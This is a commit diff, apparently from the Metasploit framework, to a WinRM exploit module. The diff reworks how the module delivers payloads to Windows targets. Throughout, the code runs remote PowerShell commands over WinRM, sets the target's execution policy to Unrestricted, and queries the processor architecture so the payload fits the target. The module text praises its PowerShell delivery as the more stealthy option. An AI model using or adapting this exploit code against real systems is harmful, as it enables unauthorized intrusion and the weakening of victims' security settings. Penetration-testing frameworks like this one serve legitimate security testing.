Hopefully final touches
Some smftidy cleanup, and added a method to check that the payload is the correct arch when using the powershell methodbug/bundler_fix
David Maloney
parent
25a6e983a1
commit
7c141e11c4
|
|
@ -29,7 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
delivery: Powershell 2.0 and VBS CmdStager.
|
||||
|
||||
The module will check if Powershell 2.0 is available, and if so uses
|
||||
that method. Otherwise it falls back to the VBS Cmdstager which is
|
||||
that method. Otherwise it falls back to the VBS Cmdstager which is
|
||||
less stealthy.
|
||||
|
||||
IMPORTANT: If targeting an x64 system with the Powershell method
|
||||
|
|
@ -78,57 +78,13 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return Msf::Exploit::CheckCode::Vulnerable
|
||||
end
|
||||
|
||||
def powershell2?
|
||||
if datastore['FORCE_VBS']
|
||||
print_status "User selected the FORCE_VBS option"
|
||||
return false
|
||||
end
|
||||
print_status "checking for Powershell 2.0"
|
||||
streams = winrm_run_cmd("powershell Get-Host")
|
||||
if streams == 401
|
||||
print_error "Login failed!"
|
||||
return false
|
||||
end
|
||||
unless streams.class == Hash
|
||||
print_error "Recieved error while running check"
|
||||
return false
|
||||
end
|
||||
if streams['stderr'].include? "not recognized"
|
||||
print_error "Powershell is not installed"
|
||||
return false
|
||||
end
|
||||
streams['stdout'].each_line do |line|
|
||||
next unless line.start_with? "Version"
|
||||
major_version = line.match(/\d(?=\.)/)[0]
|
||||
if major_version == 1
|
||||
print_error "The target is running an older version of powershell"
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
print_status "Attempting to set Execution Policy"
|
||||
streams = winrm_run_cmd("powershell Set-ExecutionPolicy Unrestricted")
|
||||
if streams == 401
|
||||
print_error "Login failed!"
|
||||
return false
|
||||
end
|
||||
unless streams.class == Hash
|
||||
print_error "Recieved error while running check"
|
||||
return false
|
||||
end
|
||||
streams = winrm_run_cmd("powershell Get-ExecutionPolicy")
|
||||
if streams['stdout'].include? 'Unrestricted'
|
||||
print_good "Set Execution Policy Successfully"
|
||||
return true
|
||||
end
|
||||
return false
|
||||
end
|
||||
|
||||
def exploit
|
||||
unless check == Msf::Exploit::CheckCode::Vulnerable
|
||||
return
|
||||
end
|
||||
if powershell2?
|
||||
return unless correct_payload_arch?
|
||||
path = upload_script
|
||||
return if path.nil?
|
||||
exec_script(path)
|
||||
|
|
@ -203,6 +159,82 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
return streams['stdout'].chomp
|
||||
end
|
||||
|
||||
|
||||
def check_remote_arch
|
||||
wql = %q{select AddressWidth from Win32_Processor where DeviceID="CPU0"}
|
||||
resp,c = send_request_ntlm(winrm_wql_msg(wql))
|
||||
#Default to x86 if we can't be sure
|
||||
return "x86" if resp.nil? or resp.code != 200
|
||||
resp_tbl = parse_wql_response(resp)
|
||||
addr_width = resp_tbl.rows.flatten[0]
|
||||
if addr_width == "64"
|
||||
return "x64"
|
||||
else
|
||||
return "x86"
|
||||
end
|
||||
end
|
||||
|
||||
def correct_payload_arch?
|
||||
target_arch = check_remote_arch
|
||||
case target_arch
|
||||
when "x64"
|
||||
unless datastore['PAYLOAD'].include? "x64"
|
||||
print_error "You selected an x86 payload for an x64 target!"
|
||||
return false
|
||||
end
|
||||
when "x86"
|
||||
if datastore['PAYLOAD'].include? "x64"
|
||||
print_error "you selected an x64 payload for an x86 target"
|
||||
return false
|
||||
end
|
||||
end
|
||||
return true
|
||||
end
|
||||
|
||||
|
||||
def powershell2?
|
||||
if datastore['FORCE_VBS']
|
||||
print_status "User selected the FORCE_VBS option"
|
||||
return false
|
||||
end
|
||||
print_status "checking for Powershell 2.0"
|
||||
streams = winrm_run_cmd("powershell Get-Host")
|
||||
if streams == 401
|
||||
print_error "Login failed!"
|
||||
return false
|
||||
end
|
||||
unless streams.class == Hash
|
||||
print_error "Recieved error while running check"
|
||||
return false
|
||||
end
|
||||
if streams['stderr'].include? "not recognized"
|
||||
print_error "Powershell is not installed"
|
||||
return false
|
||||
end
|
||||
streams['stdout'].each_line do |line|
|
||||
next unless line.start_with? "Version"
|
||||
major_version = line.match(/\d(?=\.)/)[0]
|
||||
if major_version == 1
|
||||
print_error "The target is running an older version of powershell"
|
||||
return false
|
||||
end
|
||||
end
|
||||
|
||||
print_status "Attempting to set Execution Policy"
|
||||
streams = winrm_run_cmd("powershell Set-ExecutionPolicy Unrestricted")
|
||||
if streams == 401
|
||||
print_error "Login failed!"
|
||||
return false
|
||||
end
|
||||
unless streams.class == Hash
|
||||
print_error "Recieved error while running check"
|
||||
return false
|
||||
end
|
||||
streams = winrm_run_cmd("powershell Get-ExecutionPolicy")
|
||||
if streams['stdout'].include? 'Unrestricted'
|
||||
print_good "Set Execution Policy Successfully"
|
||||
return true
|
||||
end
|
||||
return false
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue